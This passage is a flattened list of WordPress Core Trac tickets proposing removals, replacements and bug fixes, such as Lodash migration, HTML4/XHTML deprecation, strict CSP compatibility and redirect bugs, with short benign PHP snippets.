adamsilverstein External Libraries normal normal Awaiting Review task (blessed) assigned dev-feedback 2018-04-10T14:30:08Z 2023-07-17T23:20:28Z "Should we replace Underscores.js with Lodash.js? [https://wordpress.slack.com/archives/C5UNMSU4R/p1523367735000195 Discussed in Slack today (April 10th, 2018)]. It was suggested for converting WP Core to lodash, [https://github.com/facebook/jscodeshift jscodeshift] could be leveraged. Here is a list of [https://github.com/lodash/lodash/wiki/Migrating API pairings between lodash and underscores]. Concerns: Lodash 5.0 is set to have some [https://github.com/lodash/lodash/wiki/Roadmap backwards incompatible changes] that could make the migration awkward. General backwards compatibility concerns as well. How do we want to handle Backwards Compat? Most likely only core will be changed, and a migration path/tool will be offered out to theme/plugin authors." ChopinBach Future Releases 10955 Replace ThickBox External Libraries 2.9 normal normal Future Release enhancement reopened dev-feedback 2009-10-14T14:37:42Z 2023-11-10T16:01:17Z "Have you thought about replacing ThickBox? It is no longer under development (as their site says) and it doesn't conform to standard jQuery plugin practices. For example, I'm trying to use it for a plugin of mine and I'm wanting to tie into the ""onClose"" event for ThickBox which isn't too easily done. I know I could just include one of the other plugins, like colorbox, with my plugin but I think it'd be a great service to other developers if you included a more flexible library. (I would have assigned this to 3.0+ but the option isn't available.)" aaron_guitar Future Releases 30233 Replace or rewrite domain_exists() for more accurate usage Networks and Sites 3.0 normal normal enhancement new dev-feedback 2014-11-02T01:47:25Z 2019-06-04T20:09:42Z "`domain_exists()` was added in [https://mu.trac.wordpress.org/changeset/543 MU:543] in almost its current form. The enforcement of trailing slashes on paths was added in #20589 and a filter was added in #21442. A few notes: * The lookup for a domain and path combination is restricted to one network. This allows the same domain and path combination to be used on multiple networks, which should not be default behavior. * The name, `domain_exists()`, implies a check for domain. It is really checking for a full site URL. * While it is entirely possible to ignore the result by providing your own in the filter, it would be nice to not always require this for multi-network configurations. My **guess** is that the original intent was to ensure a subdomain or path was not present when creating a site on an open network. In thinking of how to address this, these two possibilities came to mind. * Deprecate `domain_exists()` and wrap a new function that does a larger check. `wp_get_site()` could work alongside `wp_get_sites()` and support domain/path lookup. * Allow the current `$site_id` argument to be `null` (for all), or an array (for many), in addition to the current `int` expectation. " jeremyfelt Future Releases 53938 replace core uses of wp_parse_url() with PHP's native parse_url() HTTP API normal normal Awaiting Review enhancement new close 2021-08-16T20:58:40Z 2021-08-17T16:38:31Z "[https://developer.wordpress.org/reference/functions/wp_parse_url/ wp_parse_url()] was introduced in #34408 to get around URL parsing failures of PHP's [https://www.php.net/manual/en/function.parse-url parse_url()] in PHP < 5.4.7. With the minimum supported PHP for core now 5.6.20, `wp_parse_url()` no longer seems necessary and `parse_url()` can be used directly. For background on this ticket, see the [https://wordpress.slack.com/archives/C02RQBWTW/p1629146151384100 slack thread]. " pbiron Future Releases 37593 "Replace ""Super Admin"" with ""Network Administrator""" Mista-Flo Administration normal normal Future Release enhancement assigned dev-feedback 2016-08-07T19:17:59Z 2018-09-24T16:39:10Z "After a note by @ocean90 (https://wordpress.slack.com/archives/core-multisite/p1470482829000310) and a following discussion (see particularly https://wordpress.slack.com/archives/core-multisite/p1470579794000339), it was cleared that the term ""Super Admin"" is used inconsistently in Core at the moment. Given that there is no Multinetwork UI in Core at the moment, all usages of the term ""Super Admin"" should probably be replaced by ""Network Administrator"". The term ""super admin"" should rather denote the user level where a user has control over all networks in an entire setup. While for a basic Multisite with one network ""super admin"" and ""network administrator"" denote a similar user level, the terms are different for a Multinetwork - and the way Core works currently, it should probably only use ""Network Administrator""." flixos90 Future Releases 60061 "Rename ""add new plugin"" button" Plugins normal normal Awaiting Review enhancement new dev-feedback 2023-12-13T16:26:01Z 2024-01-26T09:31:53Z "Hello For several versions now, we can update a plugin (and theme) by using the ""add new plugin"" feature. I think we should find a better wording because the button is not only to add a new plugin, we can update one too. At first, we could change the label button to ""Add new or update a plugin"" but it's quite long label" sebastienserre Future Releases 30691 Removing a featured image does not remove the 'post_parent' value - reproducible Media normal major Awaiting Review defect (bug) reopened dev-feedback 2014-12-12T12:38:49Z 2021-04-28T16:18:49Z "Removing a featured image does not remove the 'post_parent' value in the wp_posts row associated with the attachment. This causes invalid results when using functions like get_children() and get_posts(). 1) install a fresh copy of WordPress 4.0.1 2) edit the first post and add a featured image 3) use phpMyAdmin and look at the wp_posts table. You will see an entry for the attachment and the 'post_parent' column will be set to the ID of the first post 4) Edit the first post and remove the featured image 5) again use phpMyAdmin and look at the wp_posts table. You will see the entry for the attachment and the 'post_parent' column WILL STILL BE SET to the ID of the first post. to see a example of an error with get_children() do the following after doing the above. 1) activate twenty-thirteen and view the site 2) edit twenty-thirteen's 'content.php'. Line 15-19 should be {{{ <?php if ( has_post_thumbnail() && ! post_password_required() && ! is_attachment() ) : ?> <div class=""entry-thumbnail""> <?php the_post_thumbnail(); ?> </div> <?php endif; ?> }}} add the following right after it. {{{ <?php $args = array( 'post_type' => 'attachment', 'numberposts' => -1, 'post_status' => null, 'post_parent' => $post->ID ); $attachments = get_posts($args); if (! empty($attachments)) { echo 'attachment ID ='.$attachments[0]->ID.'<br>'; echo 'attachment post_parent ='.$attachments[0]->post_parent.'<br>'; echo '$post->ID ='.$post->ID.'<br>'; echo '<img src=""' . $attachments[0]->guid . '""/>'; var_dump($attachments); } ?> }}} 3) view the site and you will see the featured image. 4) use phpMyAdmin edit the entry for the attachment and set the 'post_parent' column to '0'. 5) view the site and you will NOT see the featured image. " juggledad Future Releases 47690 remove_submenu_page() doesn't remove corresponding entry from $_wp_submenu_nopriv johnbillion Administration normal normal Future Release defect (bug) reviewing dev-feedback 2019-07-12T10:41:09Z 2020-04-13T10:43:50Z "It can sometimes be desirable to give access to a submenu to a user that wouldn't normally have access to it. Calling `remove_submenu_page()` and then calling `add_submenu_page()` to re-register the screen with a different user capability doesn't work completely because the entry that gets added to the `$_wp_submenu_nopriv` global by `add_submenu_page()` doesn't get removed by `remove_submenu_page()`. This means the menu item appears but access to the screen is denied when `user_can_access_admin_page()` is called, resulting in a `Sorry, you are not allowed to access this page` error. " johnbillion Future Releases 44793 "remove_accents() doesnt escape all versions of ""i""" SergeyBiryukov Formatting normal normal Future Release defect (bug) reviewing dev-feedback 2018-08-14T17:42:24Z 2019-09-22T20:30:02Z "The version with both dieresis and accent is missing. Suggested addition is the following {{{ plus '΅Ι' => 'I', 'ΐ' => 'i', }}} " bagosm Future Releases 34753 "Remove use of ""Toggle"" in strings" Administration 4.4 normal normal Awaiting Review enhancement new dev-feedback 2015-11-20T15:14:58Z 2021-08-01T11:50:10Z "Hello! It would be nice to have WordPress stop using ""Toggle"" in strings in multiple places and contexts -- most particularly action buttons and helper text. It's really two possible actions/behaviors, most of the time different ones depending on the context/location/result of the previous clic, and it's always a pain to translate properly (current way in French replace ""Toggle"" with the French equivalent of ""Open/Close"". Not elegant). I could change the text, sure. But the buttons themselves, not so much. They'd need to go from displaying ""Toggle"" to displaying ""Open"" or ""Close"" depending on the current status of the target. That'd require some JavaScript wizardry. Hence, this ticket. Thanks!" xibe Future Releases 25927 Remove the theme information from style.css and add a theme manifest file Themes 3.7.1 normal normal feature request reopened dev-feedback 2013-11-12T17:31:31Z 2019-06-04T21:09:32Z "Currently the metadata related to a theme is store in a comment at the top of style.css. I argue this is not a clean separation of concerns, yes .css files can contain semantic information to help the reader navigate the file, but using it to store metadata is bad practice. I propose creating a theme manifest file that sits at the root of the theme directory and contains all the metadata related to the theme that's currently at the top of style.css, things like the name, author, etc. but it could also contain a file list for the theme with a few lines about the files usage. Externalising the metadata and adding more contextual information will greatly improve developers ability to hack on top of others themes and understand their rationale for certain decisions." jolyonruss Future Releases 48470 Remove the Custom Header and Custom Background admin pages Administration normal normal Awaiting Review enhancement new dev-feedback 2019-10-30T17:30:46Z 2019-10-30T17:30:46Z "I fell into a rabbit hole today looking into why the `custom-header.js` file is [https://core.trac.wordpress.org/browser/branches/5.3/Gruntfile.js#L689 specified to not get minified] in `Gruntfile.js`. I did not find an answer to that question (it has been like that since Core switched to the new build process in [25001] and I couldn't find prior discussion), but I realized that the custom header and background pages in the admin should probably be officially deprecated in favor of the Customizer. This is a follow up of #25569, #25571, #28032, which proposed removing these pages, but instead settled on an intermediary set of changes to encourage users, and theme and plugin developers to use the Customizer for this feature instead. Those changes were: - Change the admin menu links from links to `themes.php?page=custom-header`/`themes.php?page=custom-background` to deep links in the Customizer (`https://site.com/wp-admin/customize.php?autofocus[control]=header_image`) - Added an admin notice informing users that the feature can now be managed with live-preview in the Customizer. - Hid the Background and Header links in the admin bar and with CSS when Customizer support is present. This was in version 4.1 (5 years ago). Proper due diligence needs to be performed first, but I'd like to propose removing support for these pages in the admin in favor of redirecting users to the appropriate areas of the Customizer. The pages have been neglected for some time, and the previews are pretty broken for most themes providing a bad experience whenever a plugin or theme has linked to these pages directly." desrosj Future Releases 50653 Remove the _doing_it_wrong from WP_Block_Patterns_Registry::unregister() Editor 5.5 normal normal Future Release defect (bug) new dev-feedback 2020-07-13T21:51:41Z 2020-07-26T01:50:07Z "There's a `_doing_it_wrong()` call inside `WP_Block_Patterns_Registry::unregister()` when you try to unregister a block pattern that doesn't exist. IMO this is incorrect usage of `_doing_it_wrong()` because the function hasn't been incorrectly called, it's just been called with invalid data. ---- In addition, the `register()` and `unregister()` functions in this class ought to be returning a `WP_Error` instead of boolean `false`. Should we improve this for 5.5?" johnbillion Future Releases 59883 Remove support for HTML4 and XHTML HTML API trunk normal normal Awaiting Review enhancement new dev-feedback 2023-11-10T19:20:48Z 2024-01-22T23:24:42Z "== Summary WordPress still officially supports HTML4 and XHTML, but the browsers it serves and the broader web effectively don't. Let's remove support so that we can modernize the code we write and simplify Core's HTML-handling functionality. == Background This came up recently in #58664 and in an exploration [https://github.com/WordPress/wordpress-develop/pull/5337 rewriting esc_attr()]. In various places WordPress maintains the appearance of supporting HTML4, for example: - `wp_kses_named_entities()` rejects valid named character references like `⇵` and in turn corrupts documents containing these entities. - script and style tags conditionally add `type` attributes that never need to be printed - widgets selectively render `<nav>` and strip tags out of the `$title` for a page when TITLE elements can contain no tags anyway. This leads to corruption in the page title for removing what WordPress thinks are tags but aren't. - various places run `kses` as if serving XHTML, adding needless invalid syntax like the self-closing flag on void elements, e.g. `<img />`, `<br />`, `<meta />` The //appearance// of serving HTML4 or XHTML stems from the fact that it's very rare to serve actual XHTML content, and perhaps impossible to serve HTML4 content, to any supported browser or environment. - browsers ignore any `<xml>` or `<!DOCTYPE>` declaration specifying HTML4 or XHTML. They interpret a page as HTML5 regardless. You can confirm this by visiting a page with the `⟨` named character reference. If interpreted as HTML4 it will transform into the U+2329 `〈` code point, but if interpreted as HTML5 will transform into the U+27E8 codepoint `⟨`. - the only way to serve a page as XHTML is to send the HTTP header `Content-type: application/xhtml+xml` or to serve the page with the `.xml` file extension in the URL (e.g. serve `index.xml` instead of `index.html` or `index.php` or `/index` or `/`). It's not enough to send a `<meta http-equiv=""content-type"" content=""application/xhtml+xml"">` tag; it //must// come through the HTTP headers. Because of this behavior in browsers, WordPress sends content that it thinks is one thing but is received as another. Removing official support means that we can start to remove those places that purport to send HTML4 or XHTML content when that assumption is wrong and can lead to data corruption, let alone needless syntax noise. WordPress still serves XML content in RSS feeds; this proposal does not recommend removing support for generating the XML feeds, but it may extend to the escaping and rendering of embedded HTML within those feeds, since an RSS reader is unlikely to and should not be interpreting embedded HTML as HTML4 and should be supporting embedded HTML5 as any web browser would. As an embedding, the content rendered into the feed remains separate from the surrounding RSS XML container. == Action plan Removing support for HTML4 and XHTML doesn't require any immediate action because HTML5 parsers compliantly parse HTML4 and XHTML up to their conflicting rules, such as with the `⟨` named character reference. Since WordPress is already ""broken"" in this sense today, removing support does not imply that these are new bugs; rather it acknowledges that we missed updating WordPress once HTML4 and XHTML properly disappeared. In future work it opens up opportunities to modernize WordPress: - we don't need to handle complicated corner cases where pre-HTML5 renders require special cases. - we can remove code meant for backwards compatibility which no longer provides that support. - we can update Core functions such as `_wp_kses_named_entities()` to prevent them from corrupting data based on inaccurate parsing rules from the past. - we can define a body of support and scope for what WordPress will and won't attempt to clean up. Functions like `force_balance_tags()` and encoding functions attempt to normalize and sanitize HTML but just as often further break that HTML when passing it through to the browser would have a deterministic and safe resolution. - we can eliminate wrapping script output with CDATA escaping which is only needed for XML compatibility. - we can use HTML5 form validation by default in more places instead of requiring an opt-in. The HTML API is providing WordPress the ability to have a smarter Core HTML system that won't be confused by rare or unexpected inputs and leans heavily on a spec-compliant ""garbage-in garbage-out"" approach. This dramatically simplifies HTML processing code without opening unsafe avenues; this is because HTML5 defines how to handle abnormal inputs. Weston [https://github.com/GoogleChromeLabs/wpp-research/pull/74 queried the HTTP Archive] and found up to potentially two sites among millions that are serving XHTML content through the inclusion of proper HTTP headers. == Linked Issues - #60320 the `CDATA` wrappers around inline JavaScript break non-JavaScript `SCRIPT` contents." dmsnell Future Releases 56685 Remove LiveJournal from importer recommendations Import normal normal Awaiting Review defect (bug) new dev-feedback 2022-09-29T05:06:49Z 2022-10-04T03:23:52Z "The LiveJournal importer has seemingly been broken for quite some time, but is still recommended on the Importers screen. After reviewing some data, including the support threads and plugin directory install metrics, I recommend that we retire the LiveJournal plugin from being recommended on the Importer screen. See also #47243 and #meta5550 The importer list is pulled from WordPress.org, but a fallback list is included in core: https://core.trac.wordpress.org/browser/trunk/src/wp-admin/includes/import.php#L187" dd32 Future Releases 56362 Remove Link/Bookmark API form Core: Phase 2 desrosj General 2.1 normal normal Future Release enhancement assigned dev-feedback 2022-08-10T19:15:19Z 2023-04-27T15:51:25Z "In WordPress 3.5, the Link Manager was disabled in Core by default in new installs, and hidden entirely when no links were present on a site updating (see #21307). The intention was to return to this later and remove the Bookmark/Links API from Core entirely. However, no one returned to that second phase. This ticket is to explore removing this long hidden API from Core." desrosj Future Releases 36765 Remove Legacy Code from pingback_ping Pings/Trackbacks 4.1 normal normal defect (bug) new needs-unit-tests 2016-05-05T14:59:53Z 2019-06-04T20:58:45Z "Proposing we remove the legacy conditional url_to_postid and //$way debugging line leftover from [30139]. {{{ / let's find which post is linked to // FIXME: does url_to_postid() cover all these cases already? // if so, then let's use it and drop the old code. }}} Related: #34419 " dshanske Future Releases 51407 Remove inline event handlers and JavaScript URIs for Strict CSP-compatibility adamsilverstein Security 4.8 normal normal Future Release enhancement assigned dev-feedback 2020-09-28T13:34:53Z 2023-12-26T18:36:00Z "Content Security Policy is a mechanism designed to make applications more secure against common web vulnerabilities, particularly cross-site scripting. It is enabled by setting the Content-Security-Policy HTTP response header. An application can add a critical defense-in-depth layer against markup injection attacks by adopting a strict policy that prevents the loading of untrusted scripts or plugins. A basic policy (nonce + strict-dynamic + unsafe-eval) would block more than [https://speakerdeck.com/lweichselbaum/csp-a-successful-mess-between-hardening-and-mitigation?slide=16 40%] of the XSS sinks. To make an application compatible with strict CSP, it is necessary to make changes to HTML templates and client-side code and add the policy header: 1. Add nonces to <script> elements 2. Refactor inline event handlers and javascript: URIs 3. Refactor calls to JS APIs incompatible with CSP 4. Serve the Content-Security-Policy header [https://csp.withgoogle.com/ More on CSP]. Since these PRs are quite significant, I separated the one regarding script nonces (#39941) and the one on inline event handlers and JavaScript URIs to facilitate code reviews. This patch builds on top of [https://github.com/WordPress/wordpress-develop/pull/498 this one] (use [https://github.com/enricocarraro/wordpress-develop/compare/inline_script_using_inline_js_function...inline_event_handlers_refactoring this] link to compare the two branches easily); I introduced some new JavaScript files where I moved inline event handlers and JavaScript URIs to, in particular: * src/js/_enqueues/admin/link-manager.js: handles link deletion confirmation; * src/js/_enqueues/admin/media-events.js: events related to the media library and media details; * src/js/_enqueues/admin/setup-config.js: event handler for try again button; * src/js/_enqueues/admin/themes-list.js: theme deletion confirm event handler; * src/js/_enqueues/lib/metabox-events.js: event handlers for various meta boxes. I also moved various event handlers to already existing JavaScript files. In some cases, I couldn't move the inline event handlers to a file because 'user-defined' ajax calls could load the generated HTML, so I moved them to an inline script. " enricocarraro Future Releases 41711 Remove hAtom from core Formatting normal normal Awaiting Review defect (bug) new dev-feedback 2017-08-23T08:11:50Z 2017-08-29T17:22:23Z "We output hAtom in core and well, it's just not really needed anymore, so I'd like to get rid of it. Here, amongst other places: https://core.trac.wordpress.org/browser/tags/4.8.1/src/wp-includes/post-template.php?marks=505,506#L496" joostdevalk Future Releases 24672 Remove final from WP_Post class Posts, Post Types 3.5 normal normal Awaiting Review enhancement reopened dev-feedback 2013-07-02T03:48:03Z 2018-04-18T19:44:22Z "After discussing it with stephdau and reading through #21309, I think a discussion should be had on the validity of using the final keyword on the class. While I agree that a decorator pattern is probably best for building the class, there is still no reason for the keyword to be used. If someone wants to extend the class then they should be allowed to do so." carlalexander Future Releases 44853 Remove extra condition Plugins normal minor Awaiting Review enhancement new dev-feedback 2018-08-28T03:45:58Z 2018-09-04T17:06:56Z Remove extra `if` condition from `get_plugins` function. abhijitrakas Future Releases 39170 Remove connection between network email and super admin account Networks and Sites normal normal Future Release defect (bug) new dev-feedback 2016-12-07T23:26:30Z 2019-03-15T02:07:02Z "While looking at #34293, I came across the restriction that a user's super admin capabilities cannot be revoked when that user has the same email address that is currently specified as network (admin) email address. I just chat about this with @johnbillion and he agreed that the connection between the network email and a super admin doesn't really make sense, especially since one can easily work around it by temporarily changing the network email address before revoking super admin caps on the user. He also pointed to #14051 where the change was made, however even on that ticket there are concerns about inconsistency expressed. I think this restriction should be removed so that any super admin can have their capabilities revoked regardless of email address. This would also clarify the meaning of the network email address (which we would then change to display as something like ""Network Email"" or ""Network Notification Email""). Any information on the history why that change was made in the first place would be welcome, because on the ticket itself the comments seem to agree on what I'm describing here, although in the end the changeset still introduces the restriction without any documented context." flixos90 Future Releases 60479 Remove adminbar skiplink focus fix joedolson Toolbar 3.5 normal normal Awaiting Review defect (bug) assigned dev-feedback 2024-02-08T21:17:55Z 2024-02-13T15:43:50Z "The webkit-only skip link target fix for the adminbar is no longer required. The equivalent fix has already been removed from core themes (in #54421), and we should also remove it from the Admin bar. Was added in r22249. " joedolson Future Releases 53843 "Remove adding of rel=""noopener"" to links with target=""_blank""" General normal normal Future Release enhancement new dev-feedback 2021-07-30T22:23:15Z 2024-02-12T19:44:52Z "#43187 introduced adding of `rel=""noopener noreferrer""` to links with `target=""_blank""` as a security precaution. Later, in #49558 `noreferrer` was removed as no longer needed. Since then most browsers were updated to imply `noopener` on links with `target=""_blank""` making #43187 and similar changes not relevant any more. See: https://html.spec.whatwg.org/multipage/links.html#following-hyperlinks (specs), https://developer.mozilla.org/en-US/docs/Web/HTML/Element/a#browser_compatibility. Adding this ticket now as a reminder to remove all `noopener` when all newer browsers implement the specs. " azaozz Future Releases 40362 Remove `blog-id-cache` cache group Networks and Sites normal normal Awaiting Review defect (bug) new dev-feedback 2017-04-04T21:56:12Z 2017-10-03T17:11:29Z "The function `get_blog_id_from_url()` is the only function that uses the old `blog-id-cache` group. Since the introduction of `WP_Site_Query` it's basically redundant in there though, since site query results are cached anyway. Therefore I think we should remove the cache read and write actions in that function. We can then also remove the cache group completely (from `clean_blog_cache()` and registration as a ""global group"")." flixos90 Future Releases 38203 Remove `absint` on object IDs in `delete_metadata`, etc Options, Meta APIs 2.9 normal normal Awaiting Review defect (bug) new dev-feedback 2016-10-01T06:40:14Z 2017-04-19T02:50:43Z "Absint is run on the object ID in the functions called with a meta key: `delete_metadata()`, `get_metadata()`, `add_metadata()`, `update_metadata()` and `metadata_exists()`. This leads to unexpected behavior in the event a negative or floating object ID is passed. Related #37746, #37738, #33372." peterwilsoncc Future Releases 59594 Remove $taxonomies from cache key generation in WP_Term_Query Taxonomy normal normal Future Release enhancement new dev-feedback 2023-10-11T11:39:34Z 2023-10-26T05:52:15Z "When generating cache keys in generate_cache_key method in WP_Term_Query, a serialized version of $taxonomies is used. This is not needed as the array of taxonomies are stored in the arguments used to generate the $cache_args variable. This part of the cache key can safely be removed. Before {{{#!php $taxonomies = (array) $args['taxonomy']; $key = md5( serialize( $cache_args ) . serialize( $taxonomies ) . $sql ); }}} After {{{#!php $key = md5( serialize( $cache_args ) . $sql ); }}}" spacedmonkey Future Releases 45001 Relocate Admin Alerts to a new Alert Icon Administration normal normal Awaiting Review defect (bug) new dev-feedback 2018-09-26T21:41:46Z 2020-01-06T17:47:39Z "This is apart of a bigger project for my staff and I, you can find the context here https://www.theportlandcompany.com/2017/09/10/proposed-improvements-to-the-wordpress-ui/. Our goal is to clean up the UI with two principles in mind: - Context Visibility - Only show something when it's in context. - Add With Purpose - If something, such as padding or margins, don't serve a purpose, don't add them. - Simplify Number of Actions - If a step can be avoided in a process, avoid it. This ticket is about Alerts. Like updating WordPress, appear in the main body of the admin pages. We believe this is a disruptive experience and has many bugs associated with it: - Some notifications, such as the WordPress Core Update notification, cannot be dismissed. Sometimes authors intend this, other times it's not intentional, but it's always a nuisance because it persists across all pages. - This requires scrolling on *every* page load, if the alert is persistent across pages. On mobile this can make WP virtually unusable for rapid actions. - The dismiss button often is broken. *Many* plugins out there don't use it properly or code their own dismiss button because of a few limitations with the current function. Resulting in alerts never disappearing. - These alerts are disorienting to users who are not developers. Especially when they overrun the page. - If there is a dismiss button, often times the styling of that is inconsistent. Sometimes it's text that says ""Dismiss"". Sometimes it's a circle icon with an x. Other times it's a literal x. Sometimes it's in the top right. Sometimes it's in the bottom right. Etc... This behavior is uncommon throughout the web when you compare to GitHub, Amazon, Google anything, MacOS, etc... We propose: - Introducing an alert icon in the upper right of the admin bar. - When an alert is registered it introduces a badge count. Could be AJAX / jQuery Hearbeat, etc... - When hovered or selected you see the alerts in a menu that shifts the page body from right to left (just like MacOS notification center). - From there each item has a dismiss icon. When clicked it is *permanently* dismissed (another topic, many Plugins don't respect this for various reasons). - The dismiss icon is always a circle x icon right aligned and vertically centered. - Clicking on the alert could take the user to a new page that is contextual to the Plugin that is displaying it where they can read more information or take action. This would result in a cleaner UI, less scrolling - especially on mobile - less distraction that can and does cause confusion for some users, but maintains full functionality. Optionally we could implement growl-like notifications that hang for a moment when a new alert is registered. No dismiss buttons on those, rather they fade out automatically so Plugin authors don't use them to cause the same problem somewhere new. We'd be happy to do some design mockups and code a feature as Plugin if the leadership is interested in accepting this." s3w47m88 Future Releases 53026 "register_block_type_from_metadata fails if path points to a JSON file that is not named ""block.json""" Editor 5.5 normal normal Awaiting Review defect (bug) new dev-feedback 2021-04-13T14:43:43Z 2021-04-26T18:06:11Z "If a path to a file is given that does not end with ""block.json"", the function will exit early and the block won't be registered because the path to the json file is not found. The documentation states that either a directory or a path to a JSON file can be given: {{{ Parameters #Parameters $file_or_folder (string) (Required) Path to the JSON file with metadata definition for the block or path to the folder where the block.json file is located. }}} Example: register_block_type_from_metadata() is called with $path = path_join(__DIR__,'block-section.json'): {{{#!php <?php $path = path_join(__DIR__,'block-section.json'); register_block_type_from_metadata($path); }}} in register_block_type_from_metadata this test is performed: {{{#!php <?php function register_block_type_from_metadata( $file_or_folder, $args = array() ) { 195 $filename = 'block.json'; 196 $metadata_file = ( substr( $file_or_folder, -strlen( $filename ) ) !== $filename ) ? 197 trailingslashit( $file_or_folder ) . $filename : 198 $file_or_folder; 199 if ( ! file_exists( $metadata_file ) ) { 200 return false; 201 } }}} wich results in ""ction.json"" ""ction.json"" is not equal to $filename (""block.json""), so the $metadata_file will be assigned to a wrong path, in this case {{{ ""/var/www/html/wp-content/plugins/artifacts-section-block/block-section.json/block.json"" }}} " artifacts Future Releases 35842 Register Post Type function label default Posts, Post Types normal normal enhancement new dev-feedback 2016-02-16T10:14:42Z 2019-06-04T20:55:17Z "When registering a Post type if the label or labels arguments are not set the label takes on a default of 'Posts' and not the Post type's name. It states in the documentation that the label takes on the name of the Post type passed in as the first argument. I believe the fix is as simple as updating the defaults variable in wp-includes/post.php on line 1017 with the label argument set to the post_type variable. {{{#!php <?php $defaults = array( 'label' => $post_type, 'labels' => array(), 'description' => '', 'public' => false, 'hierarchical' => false, 'exclude_from_search' => null, 'publicly_queryable' => null, 'show_ui' => null, 'show_in_menu' => null, 'show_in_nav_menus' => null, 'show_in_admin_bar' => null, 'menu_position' => null, 'menu_icon' => null, 'capability_type' => 'post', 'capabilities' => array(), 'map_meta_cap' => null, 'supports' => array(), 'register_meta_box_cb' => null, 'taxonomies' => array(), 'has_archive' => false, 'rewrite' => true, 'query_var' => true, 'can_export' => true, 'delete_with_user' => null, '_builtin' => false, '_edit_link' => 'post.php?post=%d', ); }}}" moshiezz Future Releases 55895 Register custom post statuses Posts, Post Types normal normal Awaiting Review defect (bug) new dev-feedback 2022-06-02T10:21:10Z 2022-06-02T13:42:04Z "When a developer register a custom post status with {{{ register_post_status() }}} The post status is not added to the visual parts of a post this means you can not set the post to this new status after register the new post status. There have been several workarounds to this adding functions to get them visible but with recent WP versions this seems to have stopped working. Another feature to add is regarding the {{{ get_post_statuses() }}} and {{{ get_page_statuses()}}} only returns a static array instead of checking the available post statues. There should also be a filter on this function to Add The correct label for your custom post status. Things to improve: - Expand get_post_statuses() and get_page_statuses() to actually return the registered statuses. Add a filter to be able to label your custom post status correctly. - When custom post status is added it should also be available: • In the post list overview the post status if not published should be in the name like (draft etc) • When quick editing / bulk editing the options of all post status types should be available. • When editing a post the post status should be available in the right settings column this should also work with the classic- and Gutenberg- mode. There is an old ticket with large thread about similar issues here: #12706." angryjim Future Releases 52480 Refine the display of the comment approval notification opt-in confirmation message Comments normal normal Future Release enhancement new dev-feedback 2021-02-09T17:09:29Z 2021-04-09T15:36:56Z "Follow-up to #52406. The confirmation message shown to a user ''after they opt-in'' to receiving a notification of their pending comment's approval is currently displayed inline with a preview of their comment. This means the display of this confirmation message is only shown if the user opts in within 10 minutes of posting their comment. If they take longer than 10 minutes then their opt-in is respected but they see no confirmation message. As mentioned in the comments in [comment:7:ticket:52406] 10 minutes is likely long enough but no research was done. Let's identify if this functionality needs to be improved. Options: * Extend the time limit further. This needs to take into consideration #49956. * Disconnect the display of the confirmation message from the comment preview, and always show a confirmation message. Would need to take into consideration the cache headers on the page. * Fix the comment spam problem some other way and remove the time limit. * Do something else. * Do nothing and leave it as-is. " johnbillion Future Releases 60674 Reducing WordPress archive weight General normal normal Awaiting Review defect (bug) new dev-feedback 2024-03-02T10:36:48Z 2024-03-02T20:59:49Z "I've opened an issue on Github but, it's also surely easiest to duplicate it here to follow up it. The main idea f this ticket is to find a way to reduce the WordPress archive zip file. --- Github Description --- Over the year, WordPress archives weight have increased and... I think we can't change this but we can surely do something on old feature which are no more used. I know the backward compatibility is something really important to the WP leads eyes but we can't continue (IMO)to as 43% of the web to download files always heavier. Maybe we could work with Core team to determine which functions are no more used and deprecated from years. Removing them will make WordPress liter. I think to Classic editor, We could move all the classic editor features to the Classic Editor plugin. It would make the archive liter for the most part of the new users. Features would always be available thanks to the plugin. https://github.com/WordPress/sustainability/issues/30" sebastienserre Future Releases 33735 Reduce Duplication and Improve Comment Notification Email Functions SergeyBiryukov Comments low normal Future Release enhancement reviewing needs-unit-tests 2015-09-04T22:55:04Z 2021-01-27T19:20:55Z "Had touched on this in #33587. wp_notify_postauthor and wp_notify_moderator have some duplicative code that could be eliminated and simplified. The functions for notification also lack a filter similar to the one for displaying the comment text. Proposing the function to show the comment in text form in the notification be separated out into its own function with a filter, and the default text be improved somewhat. " dshanske Future Releases 31300 redirect_canonical returns too early Canonical normal normal defect (bug) new dev-feedback 2015-02-11T17:00:31Z 2019-12-06T10:01:04Z "If `$redirect_url` is not set or is not equal to `$requested_url` then `redirect_canonical()` returns early and does not trigger the `redirect_canonical` filter. This prevents plugins from being able to alter the canonical URL. This bug was partially addressed in #8975 (it still returned early when the redirect and requested URL are the same), but this was reverted in #11700 without any indication as to why. The attached patch ensures the filter triggers even when the `$redirect_url` is not set or is the same as `$requested_url`." stephenharris Future Releases 35635 Redirect loop for custom post types in WP 4.4 Permalinks 4.4.1 normal critical defect (bug) new dev-feedback 2016-01-27T19:46:48Z 2019-06-04T20:54:50Z "I have a client site hosted on WPE that was on 4.3.1 and when I updated to 4.4.1. it now has a redirect loop error (ERR_TOO_MANY_REDIRECTS) when trying to access a single post page (for a custom post type) from a category page. What it is doing is trying to redirect without the category in the the URL and then tries to redirect with the category, and loops; [[br]] /%category%/%postname%/ => /%postname%/ => /%category%/%postname%/ => etc. On my category page a have a list of posts with links with the markup {{{<a href=""<?php the_permalink(); ?>"" class=""custom"">...</a>}}} and my permalinks setup is ""Post name"" or ({{{/%postname%/}}}). I don't know the code causing this so I don't have much info, but with the assistance of WPE support we confirmed this is due to the WP 4.4.1 update by cloning versions and updating WP and reverting, etc. Here is [https://wordpress.org/support/topic/this-webpage-has-a-redirect-loop-43/ another instance I found] as well, but they claim to have reinstalled 4.4 and it fixed it. I tried this several times with no luck. Note: This is my first time submitting a defect/ticket, so please let me know if I need to add any other info." standuncan Future Releases 24251 Reconsider SVG inclusion to get_allowed_mime_types Upload normal normal Awaiting Review enhancement reopened dev-feedback 2013-05-02T19:36:57Z 2023-03-27T19:24:23Z "There are some who think SVG should be included in core as an allowed mime type. Makes fine enough sense to me, since there is a good argument for it, and we have support for WordPerfect documents...so there's that. Related: #20990" JustinSainton Future Releases 22889 Reconsider no-JS ?replytocom= links SergeyBiryukov* Comments normal normal Future Release enhancement accepted dev-feedback 2012-12-12T15:13:20Z 2023-03-03T07:03:13Z "We have a no-JS fallback for comment replies. Normally JS moves the comment form around. For people with JavaScript disabled, they follow the `?replytocom={123}` link. This results in a lot of extra crawling by search engines (potentially an additional crawl per reply-able comment!) in exchange for enabling an awkwardly executed, likely underused, and non-essential feature for non-JS users. I'd like to consider making comment reply JS-only." markjaquith Future Releases 41001 Recently Active Plugins Option does not reset when you delete a plugin. Plugins 4.8 normal normal Awaiting Review defect (bug) new close 2017-06-11T17:25:39Z 2022-02-26T20:18:45Z "When you deactivate a plugin 